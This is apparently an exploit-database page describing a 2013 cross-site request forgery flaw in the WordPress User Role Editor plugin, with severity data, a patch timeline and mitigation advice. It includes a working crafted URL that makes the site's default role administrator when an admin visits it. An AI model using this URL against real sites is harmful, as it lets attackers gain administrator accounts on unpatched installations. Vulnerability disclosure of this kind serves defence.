header-logo
Suggest Exploit
vendor:
User Role Editor
by:
Henry Hoggard
5.5
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: User Role Editor
Affected Version From: <=3.12
Affected Version To: 3.12
Patch Exists: YES
Related CWE:
CPE: a:wordpress:user_role_editor
Metasploit:
Other Scripts:
Platforms Tested: Debian
2013

WP User Role Editor CSRF

This exploit allows an attacker to sign up with admin privileges by making the admin visit a CSRF script.

Mitigation:

Update to version 3.14 or higher
Source

Exploit-DB raw data:

# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet

Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13

Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.

http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator

Navigation

Suggest Exploit

Services By CQR